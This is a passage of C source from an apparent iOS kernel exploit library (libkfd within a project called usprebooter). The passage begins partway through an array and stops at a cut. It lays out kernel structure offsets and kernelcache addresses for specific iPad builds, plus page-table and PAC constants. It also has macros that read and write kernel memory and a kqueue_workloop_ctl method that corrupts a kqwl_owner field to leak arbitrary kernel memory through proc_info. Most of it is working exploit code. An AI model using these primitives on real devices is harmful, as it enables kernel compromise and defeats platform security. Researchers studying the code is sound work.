.kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,12", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,12", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,12", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, }; #endif /* dynamic_info_h */ ================================================ FILE: usprebooter/libkfd/info/static_info.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef static_info_h #define static_info_h #include #define pages(number_of_pages) ((number_of_pages) * (16384ull)) signed long long t1sz_boot = 25ull; signed long long base_pac_mask = 0xffffff8000000000; #define ptr_mask ((1ull << (64ull - t1sz_boot)) - 1ull) #define pac_mask (~ptr_mask) #define unsign_kaddr(kaddr) ((kaddr) | (pac_mask)) const u64 msg_ool_size_small = (32 * 1024); #define GUARD_REQUIRED (1u << 1) struct psemnode { u64 pinfo; u64 padding; }; struct fileproc { u32 fp_iocount; u32 fp_vflags; u16 fp_flags; u16 fp_guard_attrs; u64 fp_glob; union { u64 fp_wset; u64 fp_guard; }; }; /* * kqueue stuff */ #define KQ_WORKLOOP_CREATE 0x01 #define KQ_WORKLOOP_DESTROY 0x02 #define KQ_WORKLOOP_CREATE_SCHED_PRI 0x01 #define KQ_WORKLOOP_CREATE_SCHED_POL 0x02 #define KQ_WORKLOOP_CREATE_CPU_PERCENT 0x04 struct kqueue_workloop_params { i32 kqwlp_version; i32 kqwlp_flags; u64 kqwlp_id; i32 kqwlp_sched_pri; i32 kqwlp_sched_pol; i32 kqwlp_cpu_percent; i32 kqwlp_cpu_refillms; } __attribute__((packed)); __options_decl(kq_state_t, u16, { KQ_SLEEP = 0x0002, KQ_PROCWAIT = 0x0004, KQ_KEV32 = 0x0008, KQ_KEV64 = 0x0010, KQ_KEV_QOS = 0x0020, KQ_WORKQ = 0x0040, KQ_WORKLOOP = 0x0080, KQ_PROCESSING = 0x0100, KQ_DRAIN = 0x0200, KQ_DYNAMIC = 0x0800, KQ_R2K_ARMED = 0x1000, KQ_HAS_TURNSTILE = 0x2000, }); /* * proc_info stuff */ #define PROC_INFO_CALL_LISTPIDS 0x1 #define PROC_INFO_CALL_PIDINFO 0x2 #define PROC_INFO_CALL_PIDFDINFO 0x3 #define PROC_INFO_CALL_KERNMSGBUF 0x4 #define PROC_INFO_CALL_SETCONTROL 0x5 #define PROC_INFO_CALL_PIDFILEPORTINFO 0x6 #define PROC_INFO_CALL_TERMINATE 0x7 #define PROC_INFO_CALL_DIRTYCONTROL 0x8 #define PROC_INFO_CALL_PIDRUSAGE 0x9 #define PROC_INFO_CALL_PIDORIGINATORINFO 0xa #define PROC_INFO_CALL_LISTCOALITIONS 0xb #define PROC_INFO_CALL_CANUSEFGHW 0xc #define PROC_INFO_CALL_PIDDYNKQUEUEINFO 0xd #define PROC_INFO_CALL_UDATA_INFO 0xe #define PROC_INFO_CALL_SET_DYLD_IMAGES 0xf #define PROC_INFO_CALL_TERMINATE_RSR 0x10 struct vinfo_stat { u32 vst_dev; u16 vst_mode; u16 vst_nlink; u64 vst_ino; u32 vst_uid; u32 vst_gid; i64 vst_atime; i64 vst_atimensec; i64 vst_mtime; i64 vst_mtimensec; i64 vst_ctime; i64 vst_ctimensec; i64 vst_birthtime; i64 vst_birthtimensec; i64 vst_size; i64 vst_blocks; i32 vst_blksize; u32 vst_flags; u32 vst_gen; u32 vst_rdev; i64 vst_qspare[2]; }; #define PROC_PIDFDVNODEINFO 1 #define PROC_PIDFDVNODEPATHINFO 2 #define PROC_PIDFDSOCKETINFO 3 #define PROC_PIDFDPSEMINFO 4 #define PROC_PIDFDPSHMINFO 5 #define PROC_PIDFDPIPEINFO 6 #define PROC_PIDFDKQUEUEINFO 7 #define PROC_PIDFDATALKINFO 8 #define PROC_PIDFDKQUEUE_EXTINFO 9 #define PROC_PIDFDCHANNELINFO 10 struct proc_fileinfo { u32 fi_openflags; u32 fi_status; i64 fi_offset; i32 fi_type; u32 fi_guardflags; }; struct psem_info { struct vinfo_stat psem_stat; char psem_name[1024]; }; struct psem_fdinfo { struct proc_fileinfo pfi; struct psem_info pseminfo; }; #define PROC_PIDDYNKQUEUE_INFO 0 #define PROC_PIDDYNKQUEUE_EXTINFO 1 struct kqueue_info { struct vinfo_stat kq_stat; u32 kq_state; u32 rfu_1; }; struct kqueue_dyninfo { struct kqueue_info kqdi_info; u64 kqdi_servicer; u64 kqdi_owner; u32 kqdi_sync_waiters; u8 kqdi_sync_waiter_qos; u8 kqdi_async_qos; u16 kqdi_request_state; u8 kqdi_events_qos; u8 kqdi_pri; u8 kqdi_pol; u8 kqdi_cpupercent; u8 _kqdi_reserved0[4]; u64 _kqdi_reserved1[4]; }; /* * perfmon stuff */ #define PERFMON_SPEC_MAX_ATTR_COUNT (32) struct perfmon_layout { u16 pl_counter_count; u16 pl_fixed_offset; u16 pl_fixed_count; u16 pl_unit_count; u16 pl_reg_count; u16 pl_attr_count; }; typedef char perfmon_name_t[16]; struct perfmon_event { char pe_name[32]; u64 pe_number; u16 pe_counter; }; struct perfmon_attr { perfmon_name_t pa_name; u64 pa_value; }; struct perfmon_spec { struct perfmon_event* ps_events; struct perfmon_attr* ps_attrs; u16 ps_event_count; u16 ps_attr_count; }; enum perfmon_kind { perfmon_cpmu, perfmon_upmu, perfmon_kind_max, }; struct perfmon_source { const char* ps_name; const perfmon_name_t* ps_register_names; const perfmon_name_t* ps_attribute_names; struct perfmon_layout ps_layout; enum perfmon_kind ps_kind; bool ps_supported; }; struct perfmon_counter { u64 pc_number; }; struct perfmon_config { struct perfmon_source* pc_source; struct perfmon_spec pc_spec; u16 pc_attr_ids[PERFMON_SPEC_MAX_ATTR_COUNT]; struct perfmon_counter* pc_counters; u64 pc_counters_used; u64 pc_attrs_used; bool pc_configured:1; }; struct perfmon_device { void* pmdv_copyout_buf; u64 pmdv_mutex[2]; struct perfmon_config* pmdv_config; bool pmdv_allocated; }; enum perfmon_ioctl { PERFMON_CTL_ADD_EVENT = _IOWR('P', 5, struct perfmon_event), PERFMON_CTL_SPECIFY = _IOWR('P', 10, struct perfmon_spec), }; /* * pmap stuff */ #define AP_RWNA (0x0ull << 6) #define AP_RWRW (0x1ull << 6) #define AP_RONA (0x2ull << 6) #define AP_RORO (0x3ull << 6) #define ARM_PTE_TYPE 0x0000000000000003ull #define ARM_PTE_TYPE_VALID 0x0000000000000003ull #define ARM_PTE_TYPE_MASK 0x0000000000000002ull #define ARM_TTE_TYPE_L3BLOCK 0x0000000000000002ull #define ARM_PTE_ATTRINDX 0x000000000000001cull #define ARM_PTE_NS 0x0000000000000020ull #define ARM_PTE_AP 0x00000000000000c0ull #define ARM_PTE_SH 0x0000000000000300ull #define ARM_PTE_AF 0x0000000000000400ull #define ARM_PTE_NG 0x0000000000000800ull #define ARM_PTE_ZERO1 0x000f000000000000ull #define ARM_PTE_HINT 0x0010000000000000ull #define ARM_PTE_PNX 0x0020000000000000ull #define ARM_PTE_NX 0x0040000000000000ull #define ARM_PTE_ZERO2 0x0380000000000000ull #define ARM_PTE_WIRED 0x0400000000000000ull #define ARM_PTE_WRITEABLE 0x0800000000000000ull #define ARM_PTE_ZERO3 0x3000000000000000ull #define ARM_PTE_COMPRESSED_ALT 0x4000000000000000ull #define ARM_PTE_COMPRESSED 0x8000000000000000ull #define ARM_TTE_VALID 0x0000000000000001ull #define ARM_TTE_TYPE_MASK 0x0000000000000002ull #define ARM_TTE_TYPE_TABLE 0x0000000000000002ull #define ARM_TTE_TYPE_BLOCK 0x0000000000000000ull #define ARM_TTE_TABLE_MASK 0x0000fffffffff000ull #define ARM_TTE_PA_MASK 0x0000fffffffff000ull #define PMAP_TT_L0_LEVEL 0x0 #define PMAP_TT_L1_LEVEL 0x1 #define PMAP_TT_L2_LEVEL 0x2 #define PMAP_TT_L3_LEVEL 0x3 #define ARM_16K_TT_L0_SIZE 0x0000800000000000ull #define ARM_16K_TT_L0_OFFMASK 0x00007fffffffffffull #define ARM_16K_TT_L0_SHIFT 47 #define ARM_16K_TT_L0_INDEX_MASK 0x0000800000000000ull #define ARM_16K_TT_L1_SIZE 0x0000001000000000ull #define ARM_16K_TT_L1_OFFMASK 0x0000000fffffffffull #define ARM_16K_TT_L1_SHIFT 36 #define ARM_16K_TT_L1_INDEX_MASK 0x00007ff000000000ull #define ARM_16K_TT_L2_SIZE 0x0000000002000000ull #define ARM_16K_TT_L2_OFFMASK 0x0000000001ffffffull #define ARM_16K_TT_L2_SHIFT 25 #define ARM_16K_TT_L2_INDEX_MASK 0x0000000ffe000000ull #define ARM_16K_TT_L3_SIZE 0x0000000000004000ull #define ARM_16K_TT_L3_OFFMASK 0x0000000000003fffull #define ARM_16K_TT_L3_SHIFT 14 #define ARM_16K_TT_L3_INDEX_MASK 0x0000000001ffc000ull #endif /* static_info_h */ ================================================ FILE: usprebooter/libkfd/info.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef info_h #define info_h #include "info/dynamic_info.h" #include "info/static_info.h" #include "common.h" #ifndef __OBJC__ #include void NSLog(CFStringRef, ...); #endif /* * Note that these macros assume that the kfd pointer is in scope. */ #define kfd_offset(field_name) (kern_versions[kfd->info.env.vid].field_name) #define kget_u64(field_name, object_kaddr) \ ({ \ u64 tmp_buffer = 0; \ u64 field_kaddr = (u64)(object_kaddr) + kfd_offset(field_name); \ kread((u64)(kfd), (field_kaddr), (&tmp_buffer), (sizeof(tmp_buffer))); \ tmp_buffer; \ }) #define kset_u64(field_name, new_value, object_kaddr) \ do { \ u64 tmp_buffer = new_value; \ u64 field_kaddr = (u64)(object_kaddr) + kfd_offset(field_name); \ kwrite((u64)(kfd), (&tmp_buffer), (field_kaddr), (sizeof(tmp_buffer))); \ } while (0) #define uget_u64(field_name, object_uaddr) \ ({ \ u64 field_uaddr = (u64)(object_uaddr) + kfd_offset(field_name); \ u64 old_value = *(volatile u64*)(field_uaddr); \ old_value; \ }) #define uset_u64(field_name, new_value, object_uaddr) \ do { \ u64 field_uaddr = (u64)(object_uaddr) + kfd_offset(field_name); \ *(volatile u64*)(field_uaddr) = (u64)(new_value); \ } while (0) const char info_copy_sentinel[] = "p0up0u was here"; const u64 info_copy_sentinel_size = sizeof(info_copy_sentinel); void info_init(struct kfd* kfd) { /* * Initialize the kfd->info.copy substructure. * * Note that the vm_copy() call in krkw_helper_grab_free_pages() makes the following assumptions: * - The size of the copy must be strictly greater than msg_ool_size_small. * - The source object must have a copy strategy of MEMORY_OBJECT_COPY_NONE. * - The destination object must have a copy strategy of MEMORY_OBJECT_COPY_SYMMETRIC. */ kfd->info.copy.size = pages(4); assert(kfd->info.copy.size > msg_ool_size_small); assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.src_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE | VM_FLAGS_PURGABLE)); assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.dst_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE)); for (u64 offset = pages(0); offset < kfd->info.copy.size; offset += pages(1)) { bcopy(info_copy_sentinel, (void*)(kfd->info.copy.src_uaddr + offset), info_copy_sentinel_size); bcopy(info_copy_sentinel, (void*)(kfd->info.copy.dst_uaddr + offset), info_copy_sentinel_size); } /* * Initialize the kfd->info.env substructure. */ kfd->info.env.pid = getpid(); print_i32(kfd->info.env.pid); thread_identifier_info_data_t data = {}; thread_info_t info = (thread_info_t)(&data); mach_msg_type_number_t count = THREAD_IDENTIFIER_INFO_COUNT; assert_mach(thread_info(mach_thread_self(), THREAD_IDENTIFIER_INFO, info, &count)); kfd->info.env.tid = data.thread_id; print_u64(kfd->info.env.tid); usize size1 = sizeof(kfd->info.env.maxfilesperproc); assert_bsd(sysctlbyname("kern.maxfilesperproc", &kfd->info.env.maxfilesperproc, &size1, NULL, 0)); print_u64(kfd->info.env.maxfilesperproc); struct rlimit rlim = { .rlim_cur = kfd->info.env.maxfilesperproc, .rlim_max = kfd->info.env.maxfilesperproc }; assert_bsd(setrlimit(RLIMIT_NOFILE, &rlim)); usize size2 = sizeof(kfd->info.env.kern_version); assert_bsd(sysctlbyname("kern.version", &kfd->info.env.kern_version, &size2, NULL, 0)); print_string(kfd->info.env.kern_version); /* * Initialize the kfd->info.env.build_version substructure. */ usize size3 = sizeof(kfd->info.env.build_version); assert_bsd(sysctlbyname("kern.osversion", &kfd->info.env.build_version, &size3, NULL, 0)); print_string(kfd->info.env.build_version); NSLog(CFSTR("kern.osversion: %s"), kfd->info.env.build_version); usize size4 = sizeof(kfd->info.env.device_id); assert_bsd(sysctlbyname("hw.machine", &kfd->info.env.device_id, &size4, NULL, 0)); print_string(kfd->info.env.device_id); NSLog(CFSTR("Device ID: %s"), kfd->info.env.device_id); const u64 number_of_kern_versions = sizeof(kern_versions) / sizeof(kern_versions[0]); NSLog(CFSTR("number_of_kern_version: %llu"), number_of_kern_versions); for (u64 i = 0; i < number_of_kern_versions; i++) { const char* current_kern_version = kern_versions[i].kern_version; const char* current_build_version = kern_versions[i].build_version; const char* current_device_id = kern_versions[i].device_id; // NSLog(CFSTR("Placed at: %llu "), i); /* Too much spam! */ if (strcmp(kfd->info.env.kern_version, current_kern_version) == 0 && strcmp(kfd->info.env.build_version, current_build_version) == 0 && strcmp(kfd->info.env.device_id, current_device_id) == 0) { NSLog(CFSTR("Checking done, totally fine! (Placed at %llu)"), i); kfd->info.env.vid = i; print_u64(kfd->info.env.vid); t1sz_boot = strstr(current_kern_version, "T8120") != NULL ? 17ull : 25ull; base_pac_mask = 0xffffff8000000000; if (strstr(current_device_id, "iPad") != NULL) { const char *stringList[] = {"T8103", "T8101", "T8112", "T8030", "T8020", "T8110"}; for (int i = 0; i < sizeof(stringList) / sizeof(stringList[0]); i++) { if (strstr(current_kern_version, stringList[i]) != NULL) { t1sz_boot = 17ull; base_pac_mask = 0xffff800000000000; break; } } } return; } } assert_false("unsupported osversion"); } void info_run(struct kfd* kfd) { // timer_start(); // puts("info running"); /* * current_proc() and current_task() */ assert(kfd->info.kaddr.current_proc); kfd->info.kaddr.current_task = kfd->info.kaddr.current_proc + kfd_offset(proc__object_size); print_x64(kfd->info.kaddr.current_proc); print_x64(kfd->info.kaddr.current_task); /* * current_map() */ u64 signed_map_kaddr = kget_u64(task__map, kfd->info.kaddr.current_task); kfd->info.kaddr.current_map = unsign_kaddr(signed_map_kaddr); print_x64(kfd->info.kaddr.current_map); /* * current_pmap() */ u64 signed_pmap_kaddr = kget_u64(_vm_map__pmap, kfd->info.kaddr.current_map); kfd->info.kaddr.current_pmap = unsign_kaddr(signed_pmap_kaddr); print_x64(kfd->info.kaddr.current_pmap); if (kfd->info.kaddr.kernel_proc) { /* * kernel_proc() and kernel_task() */ kfd->info.kaddr.kernel_task = kfd->info.kaddr.kernel_proc + kfd_offset(proc__object_size); print_x64(kfd->info.kaddr.kernel_proc); print_x64(kfd->info.kaddr.kernel_task); /* * kernel_map() */ u64 signed_map_kaddr = kget_u64(task__map, kfd->info.kaddr.kernel_task); kfd->info.kaddr.kernel_map = unsign_kaddr(signed_map_kaddr); print_x64(kfd->info.kaddr.kernel_map); /* * kernel_pmap() */ u64 signed_pmap_kaddr = kget_u64(_vm_map__pmap, kfd->info.kaddr.kernel_map); kfd->info.kaddr.kernel_pmap = unsign_kaddr(signed_pmap_kaddr); print_x64(kfd->info.kaddr.kernel_pmap); } // timer_end(); } void info_free(struct kfd* kfd) { assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size)); assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.dst_uaddr, kfd->info.copy.size)); } #endif /* info_h */ ================================================ FILE: usprebooter/libkfd/krkw/kread/kread_kqueue_workloop_ctl.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef kread_kqueue_workloop_ctl_h #define kread_kqueue_workloop_ctl_h const u64 kread_kqueue_workloop_ctl_sentinel = 0x1122334455667788; u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr); void kread_kqueue_workloop_ctl_init(struct kfd* kfd) { kfd->kread.krkw_maximum_id = 100000; kfd->kread.krkw_object_size = kfd_offset(kqworkloop__object_size); } void kread_kqueue_workloop_ctl_allocate(struct kfd* kfd, u64 id) { struct kqueue_workloop_params params = { .kqwlp_version = (i32)(sizeof(params)), .kqwlp_flags = KQ_WORKLOOP_CREATE_SCHED_PRI, .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, .kqwlp_sched_pri = 1, }; u64 cmd = KQ_WORKLOOP_CREATE; u64 options = 0; u64 addr = (u64)(¶ms); usize sz = (usize)(params.kqwlp_version); assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); } bool kread_kqueue_workloop_ctl_search(struct kfd* kfd, u64 object_uaddr) { u64 sentinel_min = kread_kqueue_workloop_ctl_sentinel; u64 sentinel_max = sentinel_min + kfd->kread.krkw_allocated_id; u16 kqwl_state = uget_u64(kqworkloop__kqwl_state, object_uaddr); u64 kqwl_dynamicid = uget_u64(kqworkloop__kqwl_dynamicid, object_uaddr); if ((kqwl_state == (KQ_KEV_QOS | KQ_WORKLOOP | KQ_DYNAMIC)) && (kqwl_dynamicid >= sentinel_min) && (kqwl_dynamicid < sentinel_max)) { u64 object_id = kqwl_dynamicid - sentinel_min; kfd->kread.krkw_object_id = object_id; return true; } return false; } void kread_kqueue_workloop_ctl_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) { kread_from_method(u64, kread_kqueue_workloop_ctl_kread_u64); } void kread_kqueue_workloop_ctl_find_proc(struct kfd* kfd) { u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; kfd->info.kaddr.current_proc = uget_u64(kqworkloop__kqwl_p, kqworkloop_uaddr); } void kread_kqueue_workloop_ctl_deallocate(struct kfd* kfd, u64 id) { struct kqueue_workloop_params params = { .kqwlp_version = (i32)(sizeof(params)), .kqwlp_id = id + kread_kqueue_workloop_ctl_sentinel, }; u64 cmd = KQ_WORKLOOP_DESTROY; u64 options = 0; u64 addr = (u64)(¶ms); usize sz = (usize)(params.kqwlp_version); assert_bsd(syscall(SYS_kqueue_workloop_ctl, cmd, options, addr, sz)); } void kread_kqueue_workloop_ctl_free(struct kfd* kfd) { kread_kqueue_workloop_ctl_deallocate(kfd, kfd->kread.krkw_object_id); } /* * 64-bit kread function. */ u64 kread_kqueue_workloop_ctl_kread_u64(struct kfd* kfd, u64 kaddr) { u64 kqworkloop_uaddr = kfd->kread.krkw_object_uaddr; u64 old_kqwl_owner = uget_u64(kqworkloop__kqwl_owner, kqworkloop_uaddr); u64 new_kqwl_owner = kaddr - kfd_offset(thread__thread_id); uset_u64(kqworkloop__kqwl_owner, new_kqwl_owner, kqworkloop_uaddr); struct kqueue_dyninfo data = {}; i32 callnum = PROC_INFO_CALL_PIDDYNKQUEUEINFO; i32 pid = kfd->info.env.pid; u32 flavor = PROC_PIDDYNKQUEUE_INFO; u64 arg = kfd->kread.krkw_object_id + kread_kqueue_workloop_ctl_sentinel; u64 buffer = (u64)(&data); i32 buffersize = (i32)(sizeof(struct kqueue_dyninfo)); // assert(syscall(SYS_proc_info, callnum, pid, flavor, arg, buffer, buffersize) == buffersize); uset_u64(kqworkloop__kqwl_owner, old_kqwl_owner, kqworkloop_uaddr); return data.kqdi_owner; } #endif /* 